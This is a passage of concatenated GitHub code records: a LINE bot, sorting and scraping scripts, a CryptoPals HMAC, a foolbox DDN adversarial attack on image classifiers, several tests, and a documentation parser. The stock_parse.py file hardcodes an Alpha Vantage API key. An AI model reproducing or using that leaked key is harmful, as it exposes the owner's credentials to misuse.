activate_:\n        if flag:\n            line_bot_api.reply_message(\n                event.reply_token,\n                TextSendMessage(text='建議')) # rough translation: \"suggestion\"\n        else:\n            line_bot_api.reply_message(\n                event.reply_token,\n                TextSendMessage(text='運動')) # rough translation: \"exercise\"\n        flag = not flag\n\n\nif __name__ == \"__main__\":\n#    app.run()\n    port = int(os.getenv(\"PORT\"))\n    app.run(host=\"0.0.0.0\", port=port)","repo_name":"neilctwu/linebot_test","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71503324266","text":"\"\"\"Sorting a file containing 1 000 000 000 integers using a hashing (counting) method\"\"\"\r\n\r\nfile = open(\"big_file.txt\",\"r\")\r\nlst = [0] * 121\r\n\r\nfor i in range(1_000_000):\r\n    #Reading 1 000 000 lines of the file\r\n    nums = file.readline()\r\n\r\n    nums = nums.split() #splitting the numbers in each line\r\n    for j in range(121):\r\n        count = nums.count(str(j))\r\n        lst[j] += count #incrementing the count under the corresponding list index\r\n\r\nfile.close()\r\n\r\nprint(lst) # Every index shows how many times the index number occurred in our file\r\n\r\nsorted_list = open(\"sorted_list.txt\",\"w\")\r\n\r\nel_counter = 0\r\nfor i in range(121):\r\n    for j in range(lst[i]):\r\n        sorted_list.write(str(i)+\" \")\r\n        el_counter += 1\r\n        if el_counter == 1000:\r\n            sorted_list.write(\"\\n\")\r\n            el_counter = 0\r\n\r\nsorted_list.close()","repo_name":"Tigran-Sargsyan/problems","sub_path":"hashing_sort/big_sort.py","file_name":"big_sort.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23506684248","text":"import argparse\nimport re\n\n\ndef read_num(label: str) -> int:\n    while True:\n        i = 
input(f'{label}: ')\n try:\n return int(i)\n except ValueError:\n print(f'\\'{i}\\' is not a valid number!')\n\n\ndef update_file(filename: str, regex: str, value: str):\n if args.verbose:\n print(f'Replacing [{regex}] with [{value}] at: {filename}')\n\n with open(filename, 'r') as file:\n data = file.read()\n\n data = re.sub(regex, value, data)\n\n with open(filename, 'w', newline='\\n') as file:\n file.write(data)\n\n\ndef update_files(x: int, y: int, x_offset: int, y_offset: int):\n print(f'Updating templates with coords ({x}, {y}), and ({x + x_offset}, {y + y_offset}) with offset ({x_offset}, {y_offset})')\n update_file('overlay.json',\n r'\"x\": \\d+',\n f'\"x\": {x + x_offset}')\n update_file('overlay.json',\n r'\"y\": \\d+',\n f'\"y\": {y + y_offset}')\n update_file('sync_overlay.py',\n r\"\\('template.png', \\((\\d|-)+, (\\d|-)+\\)\\)\",\n f\"('template.png', ({x + x_offset}, {y + y_offset}))\")\n update_file('index.html',\n r'data-reference=\"template.png\" data-x=\"(\\d|-)+\" data-y=\"(\\d|-)+\"',\n f'data-reference=\"template.png\" data-x=\"{x}\" data-y=\"{y}\"')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(prog='Steins;Place coord updater',\n description='Updates the coordinates in all the right places, taking offsets into'\n ' account, when appropriate.')\n parser.add_argument('-x', '--x', type=int)\n parser.add_argument('-y', '--y', type=int)\n parser.add_argument('-xo', '--x-offset', type=int, default=1500)\n parser.add_argument('-yo', '--y-offset', type=int, default=1000)\n parser.add_argument('-v', '--verbose', action='store_true')\n\n args = parser.parse_args()\n\n if not args.x:\n args.x = read_num('X coordinate')\n if not args.y:\n args.y = read_num('Y coordinate')\n\n update_files(args.x, args.y, args.x_offset, args.y_offset)\n","repo_name":"SandroHc/steins-place","sub_path":"update_coords.py","file_name":"update_coords.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"70559171309","text":"# -*- coding: utf-8 -*-\n\n# relies on JSON input of the form\n# {title -> string, author -> string, time -> datetime, text -> string}\nimport json\nimport datetime\nimport requests\nimport pandas as pd\nfrom load_articles import read_articles, write_articles\n\n\ndef write_hourlyStock(hourlyStock):\n with open('hourlyStock.json', 'w') as fp:\n json.dump(hourlyStock, fp)\n\n\ndef read_hourlyStock():\n with open('hourlyStock.json') as f:\n return json.load(f)\n\n\ndef updateJSON_prices(sym):\n APIKey = \"442ONKXSVHA79170\" # redact in submissions\n APIbase = \"https://www.alphavantage.co/query\"\n\n def rqstStockTSDataDaily(sym):\n r = None\n tries = 0\n maxTries = 10\n while not r and tries < maxTries:\n r = requests.get(APIbase, params={\n \"function\": \"TIME_SERIES_DAILY\", \"symbol\": sym, \"outputsize\": \"full\", \"apikey\": APIKey})\n tries += 1\n\n if not r:\n raise ValueError(\"Something unexpected happened.\")\n\n return r.json()[\"Time Series (Daily)\"]\n\n def getTSDataDaily(stockDat, t):\n try:\n e = stockDat[t.strftime(\"%Y-%m-%d\")]\n return {\"open\": round(float(e[\"1. open\"]), 2),\n \"close\": round(float(e[\"4. close\"]), 2),\n \"high\": round(float(e[\"2. high\"]), 2),\n \"low\": round(float(e[\"3. low\"]), 2),\n \"volume\": int(e[\"5. 
volume\"])}\n except KeyError:\n return False\n\n def getTSDataDailyForceSuccessFuture(stockDat, t, maxFail):\n y = getTSDataDaily(stockDat, t)\n i = 0\n while not y:\n t += datetime.timedelta(days=1)\n y = getTSDataDaily(stockDat, t)\n i += 1\n if i == maxFail:\n return False\n\n return (t, y)\n\n def get_datetime(article):\n return datetime.datetime.strptime(article['date_published'], \"%Y-%m-%dT%H:%M:%SZ\")\n\n def get_dtnearest_hr(article):\n return (get_datetime(article) - datetime.timedelta(hours=5)).replace(second=0, minute=0)\n\n def get_timeframe(data):\n dt_start = get_dtnearest_hr(data[0])\n dt_end = get_dtnearest_hr(data[-1])\n diff = dt_end - dt_start\n tot_hours = diff.days * 24 + diff.seconds / 3600 + 1\n timeframe = pd.date_range(start=str(dt_start), end=str(dt_end), periods=tot_hours)\n return timeframe\n\n # Updates hourlyStock\n dailyDat = rqstStockTSDataDaily(sym)\n dat = read_articles()\n dat = sorted(dat, key=lambda entry: get_datetime(entry))\n timeframe = get_timeframe(dat)\n hourlyStock = dict.fromkeys(timeframe)\n for t in timeframe:\n result = getTSDataDailyForceSuccessFuture(dailyDat, t, 1000)\n hourlyStock[t] = result[1][\"close\"] - result[1][\"open\"]\n hourlyStock = {str(k): v for k, v in hourlyStock.items()}\n write_hourlyStock(hourlyStock)\n\n # Updates the articles with delta values\n for article in dat:\n # round down to nearest hour\n t = (datetime.datetime.strptime(\n article[\"date_published\"], \"%Y-%m-%dT%H:%M:%SZ\") - datetime.timedelta(hours=5)).replace(second=0, minute=0)\n # print(dailyDat)\n result = getTSDataDailyForceSuccessFuture(dailyDat, t, 1000)\n if not result:\n article[\"delta\"] = float(0)\n else:\n article[\"delta\"] = result[1][\"close\"] - result[1][\"open\"]\n if t.date() == result[0].date():\n article[\"const\"] = True\n else:\n article[\"const\"] = False\n\n write_articles(dat)\n\n\n###################################TEST CODE HERE###################################\n# p = rqstStockTSData(\"FB\", 30) #check\n# q = getTSData(\"FB\", 30, datetime.datetime(2020, 1, 22, 16, 0)) #check\n# use average of opening and closing price\n# with open(dataFile, 'r') as f:\n# dat = json.load(f)\n# dailyDat = rqstStockTSDataDaily(\"FB\")\n# for article in dat:\n# t = (datetime.datetime.strptime(article[\"date_published\"], \"%Y-%m-%dT%H:%M:%SZ\") - datetime.timedelta(hours=5)).replace(second = 0, minute = 0)\n# print(t)\n# t_actual, s = getTSDataDailyForceSuccessFuture(dailyDat, t, 1000)\n# print(s)\n# print(\"Time: \" + str(t) + \" | Actual indexed time: \" + str(t_actual) + \" | Stock difference: %0.2f\" % (s[\"close\"] - s[\"open\"]))\nif __name__ == '__main__':\n updateJSON_prices(\"FB\")\n","repo_name":"ericygu/StocksAndStringsDuo","sub_path":"stock_parse.py","file_name":"stock_parse.py","file_ext":"py","file_size_in_byte":4388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5114583969","text":"from imports import *\n\n\ndef search_filter(playwright: Playwright, test_name: str) -> None:\n browser = playwright.chromium.launch(headless=False)\n context = browser.new_context()\n context.tracing.start(screenshots=True, snapshots=True, sources=True)\n page = context.new_page()\n page.goto(\"https://gepur.com/uk\")\n\n page.hover(\".styles_accordion__1nYPJ\") # open sidebar menu\n page.click(\"a[href^='/uk/catalog/odezhda']\") # odezhda sub menu\n\n page.click(\"a[href^='/uk/catalog/futbolki-majki']\") # tops category\n\n page.wait_for_timeout(1000)\n\n # 
page.click(\"//div[@class='promo-banner__close']\") # close banner\n # page.click(\"//span[@class='text']\") # close pop-up menu\n\n page.click(\"//div[@class='styles_more-filters__1bNkD']\") # All filters button\n page.wait_for_timeout(500)\n\n filters = page.locator(\"//div[@class='clearfix styles_filter-select__3qjY5']\").all() # list of filters\n price_sales = filters[6]\n price_sales.click()\n page.wait_for_timeout(500)\n\n page.fill(\"//input[@name='maxPrice']\", \"1200\") # input max price field\n\n show_buttons = page.locator(\"//button[@class='btn dark md']\").all() # accept button\n button = show_buttons[6]\n button.click()\n page.wait_for_timeout(1000)\n\n page.click(\"//div[@class='styles_sorting-static__2189g']\") # sorting menu\n\n sorting_filters = page.locator(\"//li[@class='styles_item__1Gxg6']\").all() # from cheapest to expensive filter\n cheapest_to_expensive = sorting_filters[1]\n cheapest_to_expensive.click()\n page.wait_for_timeout(1000)\n\n page.locator(\"//div[@class='catalog-origin__catalog-wrapper']/div\").nth(0) # first product\n page.wait_for_timeout(2000)\n items_price = page.locator(\"//div[@class='styles_prices__7vcJI']\").nth(0)\n price = items_price.inner_text() # assertion price\n expected_price = \"1200 грн\"\n expected_price_value = int(''.join(filter(str.isdigit, expected_price)))\n actual_price_value = int(''.join(filter(str.isdigit, price)))\n # assert actual_price_value <= expected_price_value\n if actual_price_value <= expected_price_value:\n print(\"\\nFilter is working correctly\")\n else:\n print(\"\\nFilter is working wrong\")\n\n global_report_path = get_report_path(test_name)\n context.tracing.stop(path=global_report_path)\ndef test_search_product_and_filter():\n with sync_playwright() as playwright:\n test_name = \"test_price_filters_and_sorting\"\n get_report_path(test_name)\n search_filter(playwright, test_name)\n","repo_name":"Zhekich123/gepur_automation_tests","sub_path":"smoke_test/test_price_filters_and_sorting.py","file_name":"test_price_filters_and_sorting.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25506061807","text":"import json\nimport openconfig_platform\nfrom pyangbind.lib import pybindJSON\n\nindent = 10 \nparent = None\nparentSlot = None\nparentSlotIndent = 0\ndef walkList(listContents, componentType):\n global indent\n global parent \n global parentSlot\n global parentSlotIndent\n# print (\"Component Type:\" + componentType + \" Indent:\" + str(indent))\n if (componentType == 'shelf'):\n if listContents[0]['tid'] in op.components.component:\n return\n shelf = op.components.component.add(listContents[0]['tid'])\n# shelf = op.components.component.add(listContents[0]['name'])\n parent = shelf\n if ('vendor' in listContents[0]):\n shelf.state.mfg_name = listContents[0]['vendor']\n# if ('type' in listContents[0]):\n# shelf.model.componenttype = listContents[0]['type']\n if ('model' in listContents[0]):\n shelf.state.description = listContents[0]['model']\n\n if (componentType == 'slot'):\n for item in listContents:\n # Slot/subslot \n slot = None;\n if (parentSlot == None):\n parentSlot = item['slotName']\n parentSlotIndent = indent\n slot = parent.holder.slots.slot.add(item['slotName'])\n slot.slotnumber = item['slotNumber']\n\n if (parentSlotIndent == indent):\n parentSlot = item['slotName']\n if ( item['slotName'] not in parent.holder.slots.slot ):\n slot = parent.holder.slots.slot.add(item['slotName'])\n 
slot.slotnumber = item['slotNumber']\n\n if (item['slotName'] != parentSlot):\n slot = parent.holder.slots.slot[parentSlot]\n\n if ('card' in item):\n card = op.components.component.add(item['card'][0]['cardId'])\n if ('description' in item['card'][0]):\n card.state.description = item['card'][0]['description']\n card.state.mfg_name = item['card'][0]['vendor']\n comp = slot.component.add(item['card'][0]['cardId'])\n if (item['slotName'] != parentSlot):\n comp.subslotname = item['slotName']\n comp.subslot = item['slotNumber']\n \n\n\n for item in listContents:\n# if (type(item) == str):\n# print ( \"---\" + item + \":\" + listContents[item])\n if (type(item) == dict):\n indent=indent+5\n walkDict(item)\t\n indent=indent-5\n\ndef walkDict(dictItem):\n global indent\n for dictTag in dictItem:\n# if (type(dictItem[dictTag]) == str):\n# print(' '.rjust(indent) + dictTag + \":\" + dictItem[dictTag])\n if (type(dictItem[dictTag]) == dict):\n# print('DictTag:'+ dictTag)\n walkDict(dictItem[dictTag])\n# if (type(dictItem[dictTag]) == list and ( dictTag == 'shelf' or dictTag == 'slot' or dictTag == 'card' or dictTag == 'port')):\n if (type(dictItem[dictTag]) == list and ( dictTag == 'shelf' or (dictTag == 'slot') or dictTag == 'card')):\n# print(' '.rjust(indent) + 'ListTag:'+ dictTag)\n walkList(dictItem[dictTag], dictTag)\n\nop = openconfig_platform.openconfig_platform()\ndef convertToYangJsonStr(jsonObj):\n equipdata = jsonObj['equipmentDtlData']\n for equipment in equipdata['equipmentLst']:\n for equipmentContainer in equipment['equipmentContainer']:\n for virtualNE in equipmentContainer['virtualNE']:\n for equipTag in virtualNE:\n if (type(virtualNE[equipTag]) == list):\n walkList(virtualNE[equipTag], equipTag)\n return(pybindJSON.dumps(op))\n","repo_name":"Verizon/YANG-validator","sub_path":"transformer/UTSEquipment.py","file_name":"UTSEquipment.py","file_ext":"py","file_size_in_byte":3464,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"70172135147","text":"import hashlib\nimport sys\nimport time\nsys.path.insert(1, \"../../\")\nimport set1.chall_2.fixedXor as ENC\n\ndef hmac(ipBytes, key, hashFunc, blockSize, outputSize):\n opad = bytes(('\\x5c'*blockSize).encode('latin1'))\n ipad = bytes(('\\x36'*blockSize).encode('latin1'))\n\n if len(key) > blockSize:\n h = hashFunc.copy()\n h.update(key)\n key = h.digest()\n \n keyPad = '\\x00'*(blockSize - len(key))\n keyPad = bytes(keyPad.encode('latin1'))\n key = key + keyPad\n\n o_key_pad = ENC.fixedXor(key, opad)\n i_key_pad = ENC.fixedXor(key, ipad)\n\n h = hashFunc.copy()\n h.update(i_key_pad+ipBytes)\n tempHash = h.digest()\n \n h = hashFunc.copy()\n h.update(o_key_pad+tempHash)\n finalHash = h.digest()\n\n return finalHash\n\n\ndef main():\n ip = 'abcde'\n ip = bytes(ip.encode('latin1'))\n key = 'b'*10\n key = bytes(key.encode('latin1'))\n hashFunc = hashlib.new('sha1')\n mac = hmac(ip, key, hashFunc, hashFunc.block_size, hashFunc.digest_size)\n print(mac)\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"D-setia/CryptoPals","sub_path":"set4/chall_31/hmac.py","file_name":"hmac.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21387023518","text":"import requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport numpy as np\n\n#result = requests.get('http://www.cdiscount.com/search/10/ordinateur.html#_his__')\ndef getSoup(url) :\n result = requests.get(url)\n 
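# Added comment: parse the fetched page; 'prdtBloc' is the CSS class of a\n    # Cdiscount product card, so each entry in the returned list is one product\n    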
soup = BeautifulSoup(result.text, 'html.parser')\n pc = soup.find_all(class_='prdtBloc')\n return pc\n\ndef getReductions(url):\n pc = getSoup(url)\n marques = []\n prix_org = []\n prix_red = []\n for i in range(1, len(pc)):\n prix_origin = pc[i].find(class_=\"prdtPrSt\")\n if prix_origin :\n prix_origin = prix_origin.text.replace(u'\\xa0', '')\n prix_origin = prix_origin.replace(',', '.')\n if prix_origin :\n prix_reduit = pc[i].find(class_=\"price\").text.replace(u'\\xa0', '')\n prix_reduit = prix_reduit.replace('€', '.')\n prix_reduit = float(prix_reduit)\n prix_org.append(float(prix_origin))\n prix_red.append(prix_reduit)\n all_marque = pc[i].find(class_='prdtBTit')\n marque = all_marque.text.replace(u'\\xa0', '')\n marques.append(marque)\n df_marque = pd.DataFrame(marques, columns=['Marques'])\n reductions_origin = pd.DataFrame(prix_org, columns=['Prix_Origine'])\n reductions_reduit = pd.DataFrame(prix_red, columns=['Prix_Réduit'])\n reductions_dataFrame = df_marque.join(reductions_origin)\n reductions_dataFrame = reductions_dataFrame.join(reductions_reduit)\n\n\n return reductions_dataFrame\n\n\ndef getcompare(marque1, marque2, url) :\n reductions_dataFrame = getReductions(url)\n liste_marque = reductions_dataFrame['Marques']\n df1 = reductions_dataFrame.copy()\n df2 = reductions_dataFrame.copy()\n\n df1['marque'] = df1.loc[df1['Marques'].str.contains(marque1), 'test'] = marque1\n df2['marque'] = df2.loc[df2['Marques'].str.contains(marque2), 'test'] = marque2\n df1 = df1.dropna(axis=0)\n df2 = df2.dropna(axis=0)\n df1 = df1.drop('test', axis =1)\n df2 = df2.drop('test', axis =1)\n df1['Reduction'] = ((df1['Prix_Origine'] - df1['Prix_Réduit'])/df1['Prix_Origine'])*100\n df2['Reduction'] = ((df2['Prix_Origine'] - df2['Prix_Réduit']) / df2['Prix_Origine'])*100\n\n\n print('Première Marque : '+ marque1)\n print(df1)\n\n print('Seconde Marque : '+ marque2)\n print(df2)\n return\n\nfor i in (range(1,5)):\n print(2*'------------------', 'Page' , i, 2*'------------------')\n getcompare('LENOVO', 'HP', 'http://www.cdiscount.com/search/10/ordinateur.html?page='+str(i)+'#_his__')\n\n\n","repo_name":"SkatiRCI/starter-kit-datascience","sub_path":"guy-marcel-mbula/Lesson3/exo_cc_lesson3.py","file_name":"exo_cc_lesson3.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"71790934826","text":"from typing import Union, Tuple\nimport eagerpy as ep\n\nfrom ..models import Model\nimport math\nfrom ..criteria import Misclassification, TargetedMisclassification\n\nfrom ..devutils import atleast_kd, flatten\n\nfrom .base import FixedEpsilonAttack\nfrom .base import get_criterion\nfrom .base import T\n\n\ndef normalize_l2_norms(x: ep.Tensor) -> ep.Tensor:\n norms = flatten(x).square().sum(axis=-1).sqrt()\n norms = ep.maximum(norms, 1e-12) # avoid division by zero\n factor = 1 / norms\n factor = atleast_kd(factor, x.ndim)\n return x * factor\n\n\nclass DDNAttack(FixedEpsilonAttack):\n \"\"\"DDN Attack\"\"\"\n\n def __init__(\n self,\n rescale: bool = False,\n epsilon: float = 2.0,\n init_epsilon: float = 1.0,\n steps: int = 10,\n gamma: float = 0.05,\n ):\n\n self.rescale = rescale\n self.epsilon = epsilon\n self.init_epsilon = init_epsilon\n self.steps = steps\n self.gamma = gamma\n\n def __call__(\n self,\n model: Model,\n inputs: T,\n criterion: Union[Misclassification, TargetedMisclassification, T],\n ) -> T:\n\n x, restore_type = ep.astensor_(inputs)\n criterion_ = get_criterion(criterion)\n del inputs, 
criterion\n\n N = len(x)\n\n if isinstance(criterion_, Misclassification):\n targeted = False\n classes = criterion_.labels\n elif isinstance(criterion_, TargetedMisclassification):\n targeted = True\n classes = criterion_.target_classes\n else:\n raise ValueError(\"unsupported criterion\")\n\n if classes.shape != (N,):\n name = \"target_classes\" if targeted else \"labels\"\n raise ValueError(\n f\"expected {name} to have shape ({N},), got {classes.shape}\"\n )\n\n if self.rescale:\n min_, max_ = model.bounds\n scale = (max_ - min_) * math.sqrt(flatten(x).shape[-1])\n init_epsilon = self.epsilon * scale\n else:\n init_epsilon = self.epsilon\n\n stepsize = ep.ones(x, len(x))\n\n def loss_fn(\n inputs: ep.Tensor, labels: ep.Tensor\n ) -> Tuple[ep.Tensor, ep.Tensor]:\n logits = model(inputs)\n\n sign = -1.0 if targeted else 1.0\n loss = sign * ep.crossentropy(logits, labels).sum()\n is_adv = criterion_(inputs, logits)\n\n return loss, is_adv\n\n grad_and_is_adversarial = ep.value_and_grad_fn(x, loss_fn, has_aux=True)\n\n delta = ep.zeros_like(x)\n\n epsilon = init_epsilon * ep.ones(x, len(x))\n worst_norm = flatten(ep.maximum(x, 1 - x)).square().sum(axis=-1).sqrt()\n\n best_l2 = worst_norm\n best_delta = delta\n adv_found = ep.zeros(x, len(x)).bool()\n\n for i in range(self.steps):\n x_adv = x + delta\n\n _, is_adversarial, gradients = grad_and_is_adversarial(x_adv, classes)\n gradients = normalize_l2_norms(gradients)\n\n l2 = ep.norms.l2(flatten(delta), axis=-1)\n is_smaller = l2 < best_l2\n\n is_both = ep.logical_and(is_adversarial, is_smaller)\n adv_found = ep.logical_or(adv_found, is_adversarial)\n best_l2 = ep.where(is_both, l2, best_l2)\n\n best_delta = ep.where(atleast_kd(is_both, x.ndim), delta, best_delta)\n\n # perform cosine annealing of LR starting from 1.0 to 0.01\n delta = delta + atleast_kd(stepsize, x.ndim) * gradients\n stepsize = (\n 0.01 + (stepsize - 0.01) * (1 + math.cos(math.pi * i / self.steps)) / 2\n )\n\n epsilon = epsilon * ep.where(is_adversarial, 1 - self.gamma, 1 + self.gamma)\n epsilon = ep.minimum(epsilon, worst_norm)\n\n # do step\n delta = delta + atleast_kd(stepsize, x.ndim) * gradients\n\n # clip to valid bounds\n delta = (\n delta\n * atleast_kd(epsilon, x.ndim)\n / delta.square().sum(axis=(1, 2, 3), keepdims=True).sqrt()\n )\n delta = ep.clip(x + delta, *model.bounds) - x\n\n x_adv = x + delta\n\n return restore_type(x_adv)\n","repo_name":"jonasrauber/foolbox-native","sub_path":"foolbox/ext/native/attacks/ddn.py","file_name":"ddn.py","file_ext":"py","file_size_in_byte":4181,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"69825188268","text":"from collections import namedtuple\nimport rx\nimport rxsci as rs\n\nx = namedtuple('x', ['foo', 'bar', 'biz'])\n\n\ndef test_fill_none_namedtuple():\n source = [\n x(None, 2, 3),\n x(None, None, None),\n x(1, None, None),\n x(1, 2, None),\n ]\n expected_result = [\n x(0, 2, 3),\n x(0, 0, 0),\n x(1, 0, 0),\n x(1, 2, 0),\n ]\n actual_result = []\n\n rx.from_(source).pipe(\n rs.data.fill_none(0)\n ).subscribe(on_next=actual_result.append)\n\n assert actual_result == expected_result\n\n\ndef test_fill_none_value():\n source = [\n None,\n 1.2,\n 5.348,\n None,\n ]\n expected_result = [\n 0, 1.2, 5.348, 0\n ]\n actual_result = []\n\n rx.from_(source).pipe(\n rs.data.fill_none(0)\n ).subscribe(on_next=actual_result.append)\n\n assert actual_result == expected_result\n\n\ndef test_fill_none_mux():\n source = [\n rs.OnCreateMux((1 ,None)),\n rs.OnNextMux((1, 
None), None),\n rs.OnNextMux((1, None), 1.2),\n rs.OnNextMux((1, None), 5.348),\n rs.OnNextMux((1, None), None),\n rs.OnCompletedMux((1, None)),\n ]\n actual_result = []\n\n rx.from_(source).pipe(\n rs.cast_as_mux_observable(),\n rs.data.fill_none(0)\n ).subscribe(on_next=actual_result.append)\n\n assert actual_result == [\n rs.OnCreateMux((1 ,None)),\n rs.OnNextMux((1, None), 0),\n rs.OnNextMux((1, None), 1.2),\n rs.OnNextMux((1, None), 5.348),\n rs.OnNextMux((1, None), 0),\n rs.OnCompletedMux((1, None)),\n ]\n","repo_name":"maki-nage/rxsci","sub_path":"tests/data/test_fill_none.py","file_name":"test_fill_none.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"} +{"seq_id":"73247063148","text":"names = [\"Harry\", \"Ron\", \"Hermoine\"]\n# list - mutable\nprint(names[0])\n\ncoordinate = (10.0, 20.0)\n# tuple - not mutable\n\n# set - collection of unique\n# dict - hash \n\n#Define a list of names\n\nnames = [\"Harry\", \"Ron\", \"Hermoine\", \"Ginny\"]\n\nnames.append(\"Draco\")\n\nnames.sort()\n\nprint(names)\n\n# Create empty set \ns = set()\n\n# Add elements to set ALWAYS unique\n\ns.add(1)\ns.add(2)\ns.add(3)\ns.add(4)\ns.add(3)\ns.remove(2)\n\n\nprint(s)\nprint(f\"The set has {len(s)} elements.\")\n","repo_name":"gaurijo/python_exercises","sub_path":"sequences.py","file_name":"sequences.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"460612210","text":"from typing import List\nfrom .IngestorInterface import IngestorInterface\nfrom .QuoteModel import QuoteModel\n\n\nclass TextIngestor(IngestorInterface):\n \"\"\"Gets Quotes from a txt File\"\"\"\n supported_extension = ['txt']\n\n @classmethod\n def parse(cls, path: str) -> List[QuoteModel]:\n if not cls.can_ingest(path):\n raise Exception('cannot ingest extension')\n\n quotes = list()\n with open(path, 'r') as f:\n for line in f.readlines():\n line = line.strip('\\n\\r').strip()\n if len(line):\n body, author = line.split('-')\n new_quote = QuoteModel(body, author)\n quotes.append(new_quote)\n\n return quotes\n","repo_name":"YogeshKJ/meme-generator-starter-code","sub_path":"src/QuoteEngine/TextIngestor.py","file_name":"TextIngestor.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36598938393","text":"import json\nfrom typing import Tuple\n\nfrom lsprotocol import types\n\n\nfrom ..client import LanguageClient\n\n\nasync def test_diagnostics(\n json_server_client: Tuple[LanguageClient, types.InitializeResult],\n uri_for,\n):\n \"\"\"Ensure that diagnostics are working as expected.\"\"\"\n client, _ = json_server_client\n\n test_uri = uri_for(\"example.json\")\n assert test_uri is not None\n\n # Get the expected error message\n document_content = \"text\"\n try:\n json.loads(document_content)\n except json.JSONDecodeError as err:\n expected_message = err.msg\n\n client.text_document_did_open(\n types.DidOpenTextDocumentParams(\n text_document=types.TextDocumentItem(\n uri=test_uri, language_id=\"json\", version=1, text=document_content\n )\n )\n )\n\n await client.wait_for_notification(types.TEXT_DOCUMENT_PUBLISH_DIAGNOSTICS)\n\n diagnostics = client.diagnostics[test_uri]\n assert diagnostics[0].message == expected_message\n\n result = await client.text_document_diagnostic_async(\n types.DocumentDiagnosticParams(\n 
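# Added note: this exercises the LSP 3.17 pull-model diagnostics request for a single document\n            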
text_document=types.TextDocumentIdentifier(test_uri)\n )\n )\n diagnostics = result.items\n assert diagnostics[0].message == expected_message\n\n workspace_result = await client.workspace_diagnostic_async(\n types.WorkspaceDiagnosticParams(previous_result_ids=[])\n )\n diagnostics = workspace_result.items[0].items\n assert diagnostics[0].message == expected_message\n","repo_name":"openlawlibrary/pygls","sub_path":"tests/lsp/test_diagnostics.py","file_name":"test_diagnostics.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":446,"dataset":"github-code","pt":"37"} +{"seq_id":"36264684431","text":"import collections\nimport logging\nimport os.path\nimport sys\nimport typing\nimport urllib.parse\nfrom collections import defaultdict\nfrom copy import deepcopy\nfrom typing import (\n Any,\n Callable,\n Dict,\n Iterable,\n List,\n MutableSequence,\n NamedTuple,\n Optional,\n Sequence,\n Set,\n Tuple,\n)\n\nfrom . import n, specparser, util\nfrom .diagnostics import (\n AmbiguousTarget,\n Diagnostic,\n DuplicateDirective,\n ExpectedPathArg,\n ExpectedTabs,\n InvalidChild,\n InvalidIAEntry,\n InvalidInclude,\n InvalidTocTree,\n MissingOption,\n MissingTab,\n MissingTocTreeEntry,\n SubstitutionRefError,\n TargetNotFound,\n UnnamedPage,\n)\nfrom .eventparser import EventParser, FileIdStack\nfrom .page import Page\nfrom .target_database import TargetDatabase\nfrom .types import FileId, ProjectConfig, SerializableType\nfrom .util import SOURCE_FILE_EXTENSIONS\n\nlogger = logging.getLogger(__name__)\n\n\n# XXX: The following two functions should probably be combined at some point\ndef get_title_injection_candidate(node: n.Node) -> Optional[n.Parent[n.Node]]:\n \"\"\"Dive into a tree of nodes, and return the deepest non-inline node if and only if the tree is linear.\"\"\"\n while True:\n if isinstance(node, n.Parent):\n if len(node.children) > 1:\n return None\n elif len(node.children) == 1:\n node = node.children[0]\n else:\n return node\n else:\n return None\n\n\ndef get_deepest(node: n.Node) -> Optional[n.Node]:\n \"\"\"Dive into a tree of nodes, and return the deepest node if and only if the tree is linear.\"\"\"\n while True:\n if isinstance(node, n.Parent):\n if len(node.children) > 1:\n return None\n elif len(node.children) == 1:\n node = node.children[0]\n else:\n return node\n else:\n return node\n\n\ndef deep_copy_position(source: n.Node, dest: n.Node) -> None:\n \"\"\"Copy the source position data from one node to another, for the case\n where the dest node's positional data is irrelevant or comes from another file.\"\"\"\n source_position = source.span\n dest.span = source_position\n if isinstance(dest, n.Parent):\n for child in dest.children:\n deep_copy_position(source, child)\n\n\nclass ProgramOptionHandler:\n \"\"\"Handle the program & option rstobjects, using the last program target\n to populate option targets.\"\"\"\n\n def __init__(self, diagnostics: Dict[FileId, List[Diagnostic]]) -> None:\n self.pending_program: Optional[n.Target] = None\n self.diagnostics = diagnostics\n\n def reset(self, fileid_stack: FileIdStack, page: Page) -> None:\n self.pending_program = None\n\n def __call__(self, fileid_stack: FileIdStack, node: n.Node) -> None:\n if not isinstance(node, n.Target):\n return\n\n identifier = f\"{node.domain}:{node.name}\"\n if identifier == \"std:program\":\n self.pending_program = node\n elif identifier == \"std:option\":\n if not self.pending_program:\n line = node.start[0]\n 
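# Added comment: an option rstobject with no preceding program target is an\n                # authoring error, so emit a diagnostic pointing at this line\n                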
